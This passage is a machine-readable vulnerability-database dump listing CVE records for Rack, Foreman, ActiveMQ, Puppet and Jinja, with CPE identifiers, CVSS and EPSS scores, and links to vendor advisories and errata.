reference_id cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
63
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*
64
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
65
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
66
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
67
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
68
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
69
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
70
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
71
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
72
reference_url https://github.com/advisories/GHSA-rf6r-2c4q-2vwg
reference_id GHSA-rf6r-2c4q-2vwg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rf6r-2c4q-2vwg
73
reference_url https://access.redhat.com/errata/RHSA-2020:1523
reference_id RHSA-2020:1523
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1523
74
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
75
reference_url https://access.redhat.com/errata/RHSA-2020:2333
reference_id RHSA-2020:2333
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2333
76
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
77
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
78
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
79
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
80
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
81
reference_url https://access.redhat.com/errata/RHSA-2020:5625
reference_id RHSA-2020:5625
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5625
82
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-10968, GHSA-rf6r-2c4q-2vwg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3wa1-khqf-x7fv
10
url VCID-3ycr-9smk-uqdc
vulnerability_id VCID-3ycr-9smk-uqdc
summary 
Potential Denial of Service Vulnerability
Carefully crafted requests can cause a `SystemStackError` and potentially cause a denial of service attack.
references
0
reference_url http://lists.fedoraproject.org/pipermail/package-announce/2015-August/164173.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.fedoraproject.org/pipermail/package-announce/2015-August/164173.html
1
reference_url http://lists.fedoraproject.org/pipermail/package-announce/2015-August/165180.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.fedoraproject.org/pipermail/package-announce/2015-August/165180.html
2
reference_url http://lists.opensuse.org/opensuse-updates/2015-07/msg00040.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-updates/2015-07/msg00040.html
3
reference_url http://lists.opensuse.org/opensuse-updates/2015-07/msg00043.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-updates/2015-07/msg00043.html
4
reference_url http://lists.opensuse.org/opensuse-updates/2015-07/msg00044.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-updates/2015-07/msg00044.html
5
reference_url http://openwall.com/lists/oss-security/2015/06/16/14
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://openwall.com/lists/oss-security/2015/06/16/14
6
reference_url http://rhn.redhat.com/errata/RHSA-2015-2290.html
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://rhn.redhat.com/errata/RHSA-2015-2290.html
7
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-3225.json
reference_id
reference_type
scores
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-3225.json
8
reference_url https://api.first.org/data/v1/epss?cve=CVE-2015-3225
reference_id
reference_type
scores
0
value 0.10456
scoring_system epss
scoring_elements 0.93234
published_at 2026-04-13T12:55:00Z
1
value 0.10456
scoring_system epss
scoring_elements 0.93216
published_at 2026-04-02T12:55:00Z
2
value 0.10456
scoring_system epss
scoring_elements 0.9322
published_at 2026-04-04T12:55:00Z
3
value 0.10456
scoring_system epss
scoring_elements 0.93218
published_at 2026-04-07T12:55:00Z
4
value 0.10456
scoring_system epss
scoring_elements 0.93227
published_at 2026-04-08T12:55:00Z
5
value 0.10456
scoring_system epss
scoring_elements 0.93231
published_at 2026-04-09T12:55:00Z
6
value 0.10456
scoring_system epss
scoring_elements 0.93235
published_at 2026-04-11T12:55:00Z
7
value 0.10456
scoring_system epss
scoring_elements 0.93232
published_at 2026-04-12T12:55:00Z
8
value 0.10456
scoring_system epss
scoring_elements 0.93207
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2015-3225
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3225
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3225
10
reference_url https://github.com/rack/rack
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack
11
reference_url https://github.com/rack/rack/blob/master/HISTORY.md
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack/blob/master/HISTORY.md
12
reference_url https://github.com/rack/rack/commits/1.4.6
reference_id
reference_type
scores
url https://github.com/rack/rack/commits/1.4.6
13
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2015-3225.yml
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2015-3225.yml
14
reference_url https://groups.google.com/forum/#!topic/ruby-security-ann/gcUbICUmKMc
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/ruby-security-ann/gcUbICUmKMc
15
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-3225
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2015-3225
16
reference_url http://www.debian.org/security/2015/dsa-3322
reference_id
reference_type
scores
0
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.debian.org/security/2015/dsa-3322
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1232292
reference_id 1232292
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1232292
18
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=789311
reference_id 789311
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=789311
19
reference_url https://github.com/advisories/GHSA-rgr4-9jh5-j4j6
reference_id GHSA-rgr4-9jh5-j4j6
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rgr4-9jh5-j4j6
20
reference_url https://access.redhat.com/errata/RHSA-2015:2290
reference_id RHSA-2015:2290
reference_type
scores
url https://access.redhat.com/errata/RHSA-2015:2290
fixed_packages
aliases CVE-2015-3225, GHSA-rgr4-9jh5-j4j6
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3ycr-9smk-uqdc
11
url VCID-3zeq-dyj1-8bdm
vulnerability_id VCID-3zeq-dyj1-8bdm
summary foreman: Ovirt admin password exposed by foreman API
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1097.json
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-1097.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-1097
reference_id
reference_type
scores
0
value 0.00369
scoring_system epss
scoring_elements 0.58708
published_at 2026-04-01T12:55:00Z
1
value 0.00369
scoring_system epss
scoring_elements 0.58782
published_at 2026-04-02T12:55:00Z
2
value 0.00369
scoring_system epss
scoring_elements 0.58804
published_at 2026-04-04T12:55:00Z
3
value 0.00369
scoring_system epss
scoring_elements 0.58772
published_at 2026-04-07T12:55:00Z
4
value 0.00369
scoring_system epss
scoring_elements 0.58824
published_at 2026-04-08T12:55:00Z
5
value 0.00369
scoring_system epss
scoring_elements 0.58831
published_at 2026-04-12T12:55:00Z
6
value 0.00369
scoring_system epss
scoring_elements 0.58849
published_at 2026-04-11T12:55:00Z
7
value 0.00369
scoring_system epss
scoring_elements 0.58812
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-1097
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1561723
reference_id 1561723
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1561723
fixed_packages
aliases CVE-2018-1097
risk_score 3.5
exploitability 0.5
weighted_severity 6.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3zeq-dyj1-8bdm
12
url VCID-5434-f6g7-8kdw
vulnerability_id VCID-5434-f6g7-8kdw
summary Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-3208.json
reference_id
reference_type
scores
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2015-3208.json
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1225252
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1225252
3
reference_url https://github.com/apache/activemq-artemis/commit/48d9951d879e0c8cbb59d4b64ab59d53ef88310d
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/apache/activemq-artemis/commit/48d9951d879e0c8cbb59d4b64ab59d53ef88310d
4
reference_url http://www.openwall.com/lists/oss-security/2015/07/24/2
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2015/07/24/2
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2015-3208
reference_id CVE-2015-3208
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2015-3208
6
reference_url https://github.com/advisories/GHSA-x6rc-54xp-ccxx
reference_id GHSA-x6rc-54xp-ccxx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x6rc-54xp-ccxx
fixed_packages
aliases CVE-2015-3208, GHSA-x6rc-54xp-ccxx
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5434-f6g7-8kdw
13
url VCID-63rx-372a-ukby
vulnerability_id VCID-63rx-372a-ukby
summary 
Improper Certificate Validation in Puppet
Previously, Puppet operated on the model that a node with a valid certificate was entitled to all information in the system and that a compromised certificate allowed access to everything in the infrastructure. When a node's catalog falls back to the `default` node, the catalog can be retrieved for a different node by modifying facts for the Puppet run. This issue can be mitigated by setting `strict_hostname_checking = true` in `puppet.conf` on your Puppet master. Puppet 6.13.0 changes the default behavior for strict_hostname_checking from false to true. It is recommended that Puppet Open Source and Puppet Enterprise users that are not upgrading still set strict_hostname_checking to true to ensure secure behavior.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7942.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7942.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7942
reference_id
reference_type
scores
0
value 0.00119
scoring_system epss
scoring_elements 0.30765
published_at 2026-04-13T12:55:00Z
1
value 0.00119
scoring_system epss
scoring_elements 0.3081
published_at 2026-04-12T12:55:00Z
2
value 0.00119
scoring_system epss
scoring_elements 0.30854
published_at 2026-04-11T12:55:00Z
3
value 0.00119
scoring_system epss
scoring_elements 0.30852
published_at 2026-04-09T12:55:00Z
4
value 0.00119
scoring_system epss
scoring_elements 0.30821
published_at 2026-04-08T12:55:00Z
5
value 0.00119
scoring_system epss
scoring_elements 0.30763
published_at 2026-04-07T12:55:00Z
6
value 0.00119
scoring_system epss
scoring_elements 0.30769
published_at 2026-04-01T12:55:00Z
7
value 0.00119
scoring_system epss
scoring_elements 0.30895
published_at 2026-04-02T12:55:00Z
8
value 0.00119
scoring_system epss
scoring_elements 0.30943
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7942
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7942
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7942
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2020-7942.yml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puppet/CVE-2020-7942.yml
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7942
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7942
6
reference_url https://puppet.com/security/cve/CVE-2020-7942
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://puppet.com/security/cve/CVE-2020-7942
7
reference_url https://puppet.com/security/cve/CVE-2020-7942/
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements
url https://puppet.com/security/cve/CVE-2020-7942/
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1816720
reference_id 1816720
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1816720
9
reference_url https://github.com/advisories/GHSA-gqvf-892r-vjm5
reference_id GHSA-gqvf-892r-vjm5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gqvf-892r-vjm5
10
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
fixed_packages
aliases CVE-2020-7942, GHSA-gqvf-892r-vjm5
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-63rx-372a-ukby
14
url VCID-6fxc-s6ht-x7ht
vulnerability_id VCID-6fxc-s6ht-x7ht
summary In Pallets Jinja before 2.8.1, str.format allows a sandbox escape.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00030.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00064.html
2
reference_url https://access.redhat.com/errata/RHSA-2019:1022
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1022
3
reference_url https://access.redhat.com/errata/RHSA-2019:1237
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1237
4
reference_url https://access.redhat.com/errata/RHSA-2019:1260
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:1260
5
reference_url https://access.redhat.com/errata/RHSA-2019:3964
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3964
6
reference_url https://access.redhat.com/errata/RHSA-2019:4062
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:4062
7
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-10745.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-10745.json
8
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-10745
reference_id
reference_type
scores
0
value 0.01022
scoring_system epss
scoring_elements 0.77239
published_at 2026-04-09T12:55:00Z
1
value 0.01022
scoring_system epss
scoring_elements 0.77266
published_at 2026-04-11T12:55:00Z
2
value 0.01022
scoring_system epss
scoring_elements 0.77246
published_at 2026-04-12T12:55:00Z
3
value 0.01022
scoring_system epss
scoring_elements 0.77243
published_at 2026-04-13T12:55:00Z
4
value 0.01022
scoring_system epss
scoring_elements 0.77217
published_at 2026-04-04T12:55:00Z
5
value 0.01022
scoring_system epss
scoring_elements 0.77182
published_at 2026-04-01T12:55:00Z
6
value 0.01022
scoring_system epss
scoring_elements 0.77188
published_at 2026-04-02T12:55:00Z
7
value 0.01022
scoring_system epss
scoring_elements 0.77199
published_at 2026-04-07T12:55:00Z
8
value 0.01022
scoring_system epss
scoring_elements 0.77231
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-10745
9
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10745
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10745
10
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
11
reference_url https://github.com/advisories/GHSA-hj2j-77xm-mc5v
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-hj2j-77xm-mc5v
12
reference_url https://github.com/pallets/jinja
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/jinja
13
reference_url https://github.com/pallets/jinja/commit/9b53045c34e61013dc8f09b7e52a555fa16bed16
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pallets/jinja/commit/9b53045c34e61013dc8f09b7e52a555fa16bed16
14
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-220.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/jinja2/PYSEC-2019-220.yaml
15
reference_url https://palletsprojects.com/blog/jinja-281-released
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://palletsprojects.com/blog/jinja-281-released
16
reference_url https://palletsprojects.com/blog/jinja-281-released/
reference_id
reference_type
scores
url https://palletsprojects.com/blog/jinja-281-released/
17
reference_url https://usn.ubuntu.com/4011-1
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value 7.7
scoring_system cvssv4
